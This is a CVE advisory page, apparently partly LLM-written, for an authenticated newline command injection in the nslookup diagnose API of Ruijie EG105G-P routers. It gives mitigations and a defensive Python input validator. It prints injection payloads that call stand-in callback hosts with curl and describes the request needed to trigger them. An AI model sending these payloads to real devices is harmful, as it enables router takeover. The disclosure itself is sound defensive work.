CVE-2026-12197
Description
Authenticated command injection in Ruijie EG105G-P diagnose endpoint allows remote attackers to execute arbitrary commands via crafted params.target.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
The Ruijie EG105G-P router running firmware ReyeeOS 2.340 (EG_3.0(1)B11P340) and earlier versions, such as ReyeeOS 1.202.2428 (EG_3.0(1)B11P202), contains an authenticated OS command injection vulnerability in the JSON-RPC diagnose endpoint. The vulnerable function is nslookup in the file /cgi-bin/luci/api/diagnose. The user-controlled parameter params.target is inserted into a shell command without proper sanitization or shell quoting. An attacker with a valid authenticated session ID can exploit this by supplying a newline character followed by arbitrary commands in the params.target value [1].
Exploitation
An attacker must first obtain a valid session ID (sid) for the diagnose API, which requires authentication as the admin user. The attacker then sends a POST request to /cgi-bin/luci/api/diagnose?auth= with a JSON payload specifying the nslookup method and a crafted params.target containing a newline and the desired command. For example, injecting \ncurl http://attacker/callback causes the shell to execute the additional command after the intended nslookup. The exploit has been publicly released and demonstrated against live devices [1].
Impact
Successful exploitation allows an attacker to execute arbitrary operating system commands on the device with the privileges of the web server (likely root). This can lead to full compromise of the router, including data exfiltration, installation of malware, or use as a pivot point for further attacks on the internal network. The impact is high due to the device's role as a network gateway [1].
Mitigation
The vendor was contacted but did not respond, and no official patch or firmware update has been released as of the publication date. Until a fix is available, administrators should restrict network access to the web management interface to trusted IPs only, use strong administrative passwords, and monitor for suspicious activity. Given the public exploit, organizations should consider the device at high risk and evaluate replacement if possible [1].
AI Insight generated on Jun 15, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Range: ≤ 2.340
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"The nslookup diagnostic method uses unquoted string interpolation (`"nslookup %s"`) to build a shell command, allowing a newline character in the user-controlled `params.target` parameter to terminate the intended command and execute an arbitrary second command."
Attack vector
An attacker who can reach the web management interface and obtain a valid authenticated session ID (sid) sends a POST request to `/cgi-bin/luci/api/diagnose?auth=<sid>` with a JSON body containing `"method": "nslookup"` and a `params.target` value that includes a newline character followed by an arbitrary shell command [ref_id=1]. The newline terminates the intended `nslookup` command line, and the shell executes the injected command. The researcher confirmed the attack by injecting `curl -s http://<callback-host>:18080/<marker>` and receiving an HTTP callback from the device [ref_id=1].
Affected code
The vulnerable endpoint is `/cgi-bin/luci/api/diagnose?auth=<sid>` in the Ruijie EG105G-P web management interface. The `nslookup` method of the JSON-RPC diagnose module inserts the user-controlled `params.target` value into a shell command using an unquoted `"nslookup %s"` format string, while the neighboring `ping` and `traceroute` helpers correctly use `%q` for shell quoting [ref_id=1].
What the fix does
No patch has been published by the vendor. The researcher recommends replacing the unsafe `"nslookup %s"` string interpolation with argument-vector execution APIs or, at minimum, using the `%q` shell-quoting format that is already employed by the adjacent `ping` and `traceroute` diagnostic helpers [ref_id=1]. Additional mitigations include strict allowlist validation of diagnostic targets, rejection of control characters such as `\r` and `\n`, and adding regression tests for shell metacharacters across all diagnose methods [ref_id=1].
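As a defensive illustration of the fix described above (an added example, not vendor or researcher code; the LuCI module is Lua, but the same pattern is shown here in Python): validate the diagnostic target against a strict hostname/IP allowlist, reject control characters such as `\r` and `\n`, and hand the value to the resolver as one argv element instead of interpolating it into a shell string. Function names are assumptions.

```python
import ipaddress
import re
import subprocess
from typing import List

# Allowlist grammar for a diagnostic target: RFC 1123 hostname labels (letters,
# digits, hyphens, no leading/trailing hyphen, 1-63 chars) joined by dots.
# The grammar contains no shell metacharacters and no control characters.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"(?:{_LABEL}\.)*{_LABEL}\.?")
_MAX_TARGET_LEN = 253


def validate_diagnose_target(target: str) -> str:
    """Return target unchanged if it is a hostname or IP literal, else raise ValueError."""
    if not isinstance(target, str) or not target:
        raise ValueError("target must be a non-empty string")
    if len(target) > _MAX_TARGET_LEN:
        raise ValueError("target too long")
    # Explicit control-character check: CR/LF is exactly what lets a second
    # command line follow the intended one in the "nslookup %s" pattern.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in target):
        raise ValueError("control character in target")
    try:
        ipaddress.ip_address(target)  # IPv4 or IPv6 literal
        return target
    except ValueError:
        pass
    # fullmatch, not match with "$": in Python "$" also matches just before a
    # trailing newline, so "^...$" would wrongly accept "example.com\n".
    if _HOSTNAME_RE.fullmatch(target):
        return target
    raise ValueError("target is not a hostname or IP literal")


def nslookup_argv(target: str) -> List[str]:
    """Argument-vector form: the target is a single argv element, never parsed by a shell."""
    return ["nslookup", validate_diagnose_target(target)]


def run_nslookup(target: str, timeout: float = 10.0) -> str:
    """Execute via an argv list (no shell=True), so there is no command string to inject into."""
    proc = subprocess.run(
        nslookup_argv(target), capture_output=True, text=True, timeout=timeout, check=False
    )
    return proc.stdout
```

Applying `validate_diagnose_target` to every diagnose method (ping and traceroute included) gives the regression coverage for shell metacharacters that the researcher recommends.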
Preconditions
- Network: the attacker must have network access to the device's web management interface (HTTP/HTTPS).
- Authentication: the attacker must possess a valid authenticated session ID (sid) for the diagnose API, obtained through administrator login.
- Configuration: the vulnerable endpoint /cgi-bin/luci/api/diagnose must be reachable and the nslookup method must be enabled.
Reproduction
The researcher provides a Python PoC script that authenticates as admin, starts a local HTTP callback listener, and sends a POST request to `/cgi-bin/luci/api/diagnose?auth=<sid>` with a JSON body containing `"method": "nslookup"` and `"params": {"target": "example.com\ncurl -s http://<callback-host>:18080/<marker>"}`. The callback listener receives an HTTP GET from the device IP, and the diagnose API response includes the callback listener's response body, confirming command execution [ref_id=1].
Generated on Jun 15, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
News mentions
No linked articles in our index yet.